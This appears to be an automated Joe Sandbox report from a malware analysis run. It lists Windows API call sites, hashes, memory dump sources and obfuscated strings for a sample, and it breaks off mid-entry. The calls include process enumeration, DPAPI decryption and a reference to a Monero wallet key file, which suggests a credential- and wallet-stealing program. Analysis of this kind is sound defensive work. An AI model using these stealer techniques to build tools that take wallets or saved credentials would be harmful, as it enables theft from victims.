                              • Instruction ID: ebba6bc226297dc2136381d8d290c35afcd3e6b705ce14908ae33e5af3a49945
                              • Opcode Fuzzy Hash: 242072a063c7a25a321a1ab9635ab71969325972c5dfb5c5f33b4a96594a975f
                              • Instruction Fuzzy Hash: 84B228F390C304AFE304AE2DEC8567ABBE9EF94760F1A853DE6C487744E63558058792
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A005B7), ref: 009F86CA
                              • Process32First.KERNEL32(?,00000128), ref: 009F86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 009F86F3
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • CloseHandle.KERNEL32(?), ref: 009F8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 27061aadad9206bd3f93a866de587c2b9480e63e81fabaab1152f5e693ecefb1
                              • Instruction ID: 5a01bdda534bcc0ed866157596e670eb04d4549c0bb91f494d552fca52dbb260
                              • Opcode Fuzzy Hash: 27061aadad9206bd3f93a866de587c2b9480e63e81fabaab1152f5e693ecefb1
                              • Instruction Fuzzy Hash: 113168B190121CABCB24EF50DC45FEEB778EB85740F1081A9E20EA61A0DF706A45CFA1
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,009E5184,40000001,00000000,00000000,?,009E5184), ref: 009F8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 5bd8f33a1910718458b61c03af399150a3b8a3f69c7f3b6bd05a8a56387c83e2
                              • Instruction ID: 0d8631580d79214f528ce65f7c6fb3cdf85fc28f29e9045bcb97bc69044c002e
                              • Opcode Fuzzy Hash: 5bd8f33a1910718458b61c03af399150a3b8a3f69c7f3b6bd05a8a56387c83e2
                              • Instruction Fuzzy Hash: 17112A74210208FFDB40CF64D885FBB33A9AF89714F109848FA198B250DB75EC41DBA0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                              • LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 4a59705ba9cad7263162e16c916f793eea1619ce4127912961646213cb7404d5
                              • Instruction ID: 3f63c88da2fd1e29988bc39a60c8605872a3323aa1d9b4e6a1ba5d9bc9905533
                              • Opcode Fuzzy Hash: 4a59705ba9cad7263162e16c916f793eea1619ce4127912961646213cb7404d5
                              • Instruction Fuzzy Hash: 7811A2B4240208BFEB10CF64DC95FAA77B9FB89700F208058FA159B3D0C7B6A941CB90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A00E00,00000000,?), ref: 009F79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00A00E00,00000000,?), ref: 009F79C4
                              • wsprintfA.USER32 ref: 009F79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 195ff4d5baea6eb599b25f54cbcdd4242a1b71a9d7d2fbffb243e269378a3d15
                              • Instruction ID: 26ce1d125b7e5685c4d2f2c6463d706e454385cf9a67de82806703cf58458ebe
                              • Opcode Fuzzy Hash: 195ff4d5baea6eb599b25f54cbcdd4242a1b71a9d7d2fbffb243e269378a3d15
                              • Instruction Fuzzy Hash: 861127B2914118ABCB24DFCADD45BBEB7F8FB4CB11F10421AF605A2680E7795941CBB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013BDFB0,00000000,?,00A00E10,00000000,?,00000000,00000000), ref: 009F7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013BDFB0,00000000,?,00A00E10,00000000,?,00000000,00000000,?), ref: 009F7A7D
                              • wsprintfA.USER32 ref: 009F7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 3972808bbea630eec38f0be94965f5f8a8b05670edfcaafc4d61fb002b7a87db
                              • Instruction ID: 0e4c841ec968b3dc5b48df46ae669487bc93e9a0f4ffa004ab0434f55c0a5d9a
                              • Opcode Fuzzy Hash: 3972808bbea630eec38f0be94965f5f8a8b05670edfcaafc4d61fb002b7a87db
                              • Instruction Fuzzy Hash: C8118EB1A45218EBEB208F94DC49FA9B778FB04721F10479AFA0A932C0D7745A41CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2?/$\j[d$^:
                              • API String ID: 0-195109781
                              • Opcode ID: 078045ba41da9d7e4ab749d091dea316750743484ec884100e214b72e271ee73
                              • Instruction ID: eeffb436fed73f37a716e5f3280de3bb9ee6503ac23cd502dd73626efb8bb71c
                              • Opcode Fuzzy Hash: 078045ba41da9d7e4ab749d091dea316750743484ec884100e214b72e271ee73
                              • Instruction Fuzzy Hash: 0EB217B360C2049FE7046E29EC8567AFBE9EFD4720F1A853DE6C5C3740EA3598058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >pn$CsSo$CsSo
                              • API String ID: 0-315857674
                              • Opcode ID: 44559a53d6008c7fc4ded1b961b44d94f846f1375cacd6675439875850d7f144
                              • Instruction ID: 28ccd021e109175ab7116eeee35d9c86b5bb4d92c6e40718674a0d95f5ce83f2
                              • Opcode Fuzzy Hash: 44559a53d6008c7fc4ded1b961b44d94f846f1375cacd6675439875850d7f144
                              • Instruction Fuzzy Hash: 39B2F7F3A0C2049FE3046E2DEC8567AFBE9EB94720F1A463DEAC4C7744E93558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $ =w$&wmn$Q:i
                              • API String ID: 0-1203201082
                              • Opcode ID: b771be9bc6d854b68dc6958bde1e2194a5254e64776c14f35cd8b613a72bf3d4
                              • Instruction ID: dbdfcb57cdb8012af770f0bce9aaa6fb5fbc35123adbb029cca4a977c131f6aa
                              • Opcode Fuzzy Hash: b771be9bc6d854b68dc6958bde1e2194a5254e64776c14f35cd8b613a72bf3d4
                              • Instruction Fuzzy Hash: CB92F5F3A0C2009FE304AE2DEC8567ABBE5EF94720F16493DEAC5C7344EA3558158697
                              APIs
                              • CoCreateInstance.COMBASE(009FE118,00000000,00000001,009FE108,00000000), ref: 009F3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009F37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 4d3b20dd372a7040ccd8f52c6f16971dd5487d19e50ab86b61b6902c4533c284
                              • Instruction ID: 8b8b78e7035ef9dfeeeae86817322f66bb9eb20e2cd44263a5489651e16fea3a
                              • Opcode Fuzzy Hash: 4d3b20dd372a7040ccd8f52c6f16971dd5487d19e50ab86b61b6902c4533c284
                              • Instruction Fuzzy Hash: 1141D970A40A2C9FDB24DB58CC95BABB7B5BB48702F4081D8E609E72D0D7756E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 009E9BA3
                              • LocalFree.KERNEL32(?), ref: 009E9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: eb81ee018472174795faba2bb4579ce4613df5be94a77272241b2b0355028729
                              • Instruction ID: d3921db6c3dc035597bd6cabc3546800177101f575687fa74cd0223d4c3c8cbc
                              • Opcode Fuzzy Hash: eb81ee018472174795faba2bb4579ce4613df5be94a77272241b2b0355028729
                              • Instruction Fuzzy Hash: F411CCB4A00209DFDB05DF94D985BAE77B9FF88300F104568E91597390D774AE51CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: W<{X$yF?N
                              • API String ID: 0-3006374243
                              • Opcode ID: f4d52f58a131d172ccfc2226181695fdc55a6f01df527f649d4b799e5e767820
                              • Instruction ID: 8f1d611674c7c8bf6acc47b3cb541b5e659c56bcd51d72519785f0297539bb2b
                              • Opcode Fuzzy Hash: f4d52f58a131d172ccfc2226181695fdc55a6f01df527f649d4b799e5e767820
                              • Instruction Fuzzy Hash: FCB2F4F390C2109FE3086E2DEC8567ABBE9EF94320F16492DEAC587744EA3558058797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: TI3n$v:?
                              • API String ID: 0-3113827137
                              • Opcode ID: e9b5210095d41e2ad02b18ae2052997a9d9cff1e7a38e10be2af33d97787887d
                              • Instruction ID: fd65d05678c2fba90321c98aa52e536eb3433c75ba97e3a94ff9e8807012a4bd
